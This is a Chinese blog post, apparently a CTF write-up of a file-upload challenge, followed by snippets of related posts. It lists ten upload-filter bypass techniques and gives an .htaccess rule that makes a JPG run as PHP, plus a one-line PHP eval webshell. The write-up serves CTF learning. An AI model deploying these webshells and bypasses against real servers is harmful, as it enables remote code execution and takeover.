[MRCTF2020]你传你码呢

最新推荐文章于 2024-05-16 07:28:21 发布
最新推荐文章于 2024-05-16 07:28:21 发布
阅读量915 收藏 3
点赞数 1
文章标签: php apache web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68074153/article/details/126224423
版权

1.是兄弟就来传马

题目提示很明显,就是让我们上传木马。
文件上传的基本思路有下面这些方面。

1、前端绕过,抓包修改后缀名,
2、文件内容绕过,用图片马,抓包修改后缀绕过
3、黑名单绕过,那么我们可以改成phtml抓包绕过
4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”
5、大小写绕过,抓包后修改后缀为.PHp
6、空格绕过,抓包修改后缀,在后缀后面加上空格
7、点绕过,抓包修改后缀,在后缀后面加上点(删掉空格还可以. .或者 . )
8、文件流绕过,前提条件,必须是window的服务器,抓包修改后缀,并在后缀后面加上::$DATA,
9、双拼绕过,抓包修改后缀,并在把后缀改成pphphp,这样后端去掉php,还剩下个p和hp组合在一起,又是php
10、.user.ini配置文件绕过

2…htaccess文件解析漏洞

经过抓包修改后缀名,修改mime类型,后缀别名之类的修改,发现都被ban了。
在这里插入图片描述
最后尝试了一下修改htaccess配置文件发现上传成功了。
.htaccess文件解析漏洞.htaccess文件解析漏洞

通过修改apache的.htaccess配置文件可以将其他类型的文件当作php文件来解析。

上传.htaccess文件文件如下

<FilesMatch "1.jpg">//修改的文件,弱改为.jpg则会吧所有.jpg文件当作php文件解析。
SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述
上传时要记得抓包修改一下mime类型绕过mime类型的过滤。
在这里插入图片描述
上传成功,接下来上传我们的图片一句话。

<script language='php'>eval($_REQUEST['a']);</script>

在这里插入图片描述
上传成功,访问。
在这里插入图片描述
一片空白,可以看到我们的1.jpg被当作php解析了。
蚁剑连接。
在这里插入图片描述
成功拿到flag。

SheepLeeeee
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
buuctf 你
zoixsoadji的博客
03-12 604
进入题目是一个文件上,先随便上一个文件试试 经过测试发现,只能上图片文件。 那么我们就写一个包含一句话木的图片文件 这样可以防止上的时候题目过滤<?这类符号导致上失败。 接下来,就是熟悉的上时抓包然后改文件后缀了 改了之后,发现不行,那就得换一种方法了,第一个想到的就是.htaccess 文件。 .htaccess文件(或者"分布式配置文件")提供了针对每个目录改变配置的方法,即在一个特定的目录中放置一个包含指令的文件,其中的指令作用于此目录及其..
CTF题之BUUCTF系列:BUUCTF Misc 你竟然赶我走
一只小蜜蜂的博客
07-31 3347
一、名称 BUUCTF Misc 你竟然赶我走 二、题目链接:https://buuoj.cn/challenges 解压缩后是一个jpg文件 打开图片如下: 三、解题步骤1、方法一: 使用winhex工具打开biubiu.jpg文件,查看一下内部结构 文档最后面显示出了flag值为 flag{stego_is_s0_bor1ing} 2、方法二: 使用StegSolve工具打开,Analyse--File Format--获得右图结果 文档左下角显示出flag值为...
BUUCTF之你呢 [MRCTF2020]
Ran_799的博客
12-04 554
文件上绕过的方法有很多, 试了一下发现能用.htaccess解析漏洞,我们先创建一个文件,文件名为.htaccess,内容为。还是被过滤掉了,接着修改一下MIME信息,判断是不是有MIME过滤,将请求头的Content-Type内容改为。上成功了,确认是黑名单过滤文件后缀跟MIME,还回显了路径,那这就好办了。接着我们切到重复器那边,随便修改一下文件后缀,判断是白名单还是黑名单绕过。然后复制一下回显的地址,并将之前的连接拼起来,得到后面的url。上该文件,抓包修改一下MIME信息。
buuctf之文件上漏洞(Pass1~15)_bucctf文件上 1
最新发布
2401_84252281的博客
05-16 571
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
『CTF Web复现』BUUCTF-[MRCTF2020]你
Ho1aAs‘s Blog
09-26 643
# 利用点 - 上htaccess解析png
[MRCTF2020]你你呢1
m0_73721944的博客
11-18 102
还是被过滤掉了,接着修改一下MIME信息,判断是不是有MIME过滤,将请求头的Content-Type内容改为 image/png 继续发送。文件上绕过的方法有很多, 试了一下发现能用.htaccess解析漏洞,我们先创建一个文件,文件名为.htaccess,内容为。上成功了,确认是黑名单过滤文件后缀跟MIME,还回显了路径,那这就好办了。接着我们切到重复器那边,随便修改一下文件后缀,判断是白名单还是黑名单绕过。上成功,接着我们来到重复器, 将文件名改为abc。再用蚁剑即可得到flag。
BUUCTF
hao2580的博客
04-11 687
[MRCTF2020]你你????呢 知识点:文件上 1.Apache服务器 上.htaccess 文件,bp抓包 AddType application/x-httpd-php .jpg(将jpg当做PHP解析) 2.MIME类型验证绕过:修改Content-type为:image/jpeg 上 再上jpg,蚁剑连上,url http://b29acfc2-511c-4e8d-980...
buuctf之文件上漏洞(Pass1~15)_bucctf文件上 1,网络安全面试简历
2301_79054215的博客
04-15 276
在指定字符串中从后面开始的第一次出现的位置,如果成功,则返回从该位置到字符串结尾的所有字符,如果失败,则返回 false。file_ext,所以相当于只去除前后空格和最后的一个点,还有一个点没被去除,就能利用Windows特性(自动去除文件后的带点)2.上 .htaccess文件,在将要上php文件(或其他文件)后缀修改为txt(或其他在黑名单之外的),然后上。(mime与文件后缀名作用类似,来告诉服务器文件的性质和格式,但比后缀名更详细,浏览器一般用mine而不用后缀名)
vigenere-cipher:Vigenere密
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
向前欧拉法matlab代-zbc-ops:我的GitHub个人资料的配置文件
05-20
向前欧拉法matlab代 本周还是刷题,深入学习了winner攻击以及extend winner attack.然后就是做了几个有关造格子的题,没学很多,挺忙的。 直接从博客复制过来的,格式和markdown显示有点...选择不同的素数对,$l
[MRCTF2020]你呢解题
Bird&Bird
10-28 556
1、首先右键查看页面源代,可知后端支持PHP。 2、上一句话木,果断报错了 3、将文件后缀名修改为php3/php4/php5/phtml后,在上,仍然报错。 4、那上.htaccess文件试试吧 SetHandler application/x-httpd-php bp抓包,修改filename=".htaccess" 报错了,怀疑是对Content-Type做了过滤,将Content-Type修改为image/jpeg后在上,上成功了。 ...
CTF web题目中怎么用写脚本的方法POST参?——-利用python脚本
日熙的博客
07-14 3951
Python 提供了简单易用、功能强大的 HTTP 第三方开源库 Requests,帮助我们轻松解决关于 HTTP 的大部分问题。 在写python脚本之前必须得先导入requests模块哦,详细教程见:win10 python如何安装requests———超详细教程 下面就用题目Bugku web基础$_POST来做示范: 运行python程序,输入如下命令: import requests r = requests.post(‘http://123.206.87.240:8002/post/’, dat
ctf get post 参 HackBar
热门推荐
weixin_44614983的博客
01-31 3万+
get和post是http协议的两种基本请求方式 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 https://www.w3school.com.cn/tags/html_ref_httpmethods.asp 知乎上这篇更详细,关于get和post的区别 https://www.zhihu.com/question/28586791 web题中会遇到,比如...
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9062
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
【BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5302
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
[MRCTF2020]你你?呢
u011250160的博客
12-20 2917
php常规后缀绕过一波发现全被过滤 发现jpg图片是能上的 图片里的怎么用呢 1.文件包含 原理:文件包含过程中执行了图片里的代 2.apache解析漏洞 原理: 当AllowOverride被启用时,上启用解析规则的.htaccess 修改.htaccess文件的内容即可修改图片的解析方式 这里想利用文件包含是很难了 因为没有任何条件看出有包含漏洞 那么就尝试第二种方法 这行代的意思就是把.jpg格式的文件当成php文件去解析 上发现还是被过滤 那这个能不能绕过呢 之前我们不是已经发现j
[MRCTF2020]你
weixin_44477223的博客
03-27 209
题目运用的知识点 文件上漏洞 .htaccess文件(分布式配置文件) 内容 解题 见面就看见我笑川天皇的图片,这题目还挺别致的。 这是一个很明显的文件上漏洞题,这里我们直接抓包进行文件上 发现只能上JPG格式的文件。 我们尝试修改Content-Type来上PHP文件发现失败。这里我们就需要运用.htaccess文件(分布式配置文件)来进行绕过 .htaccess文件 .htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值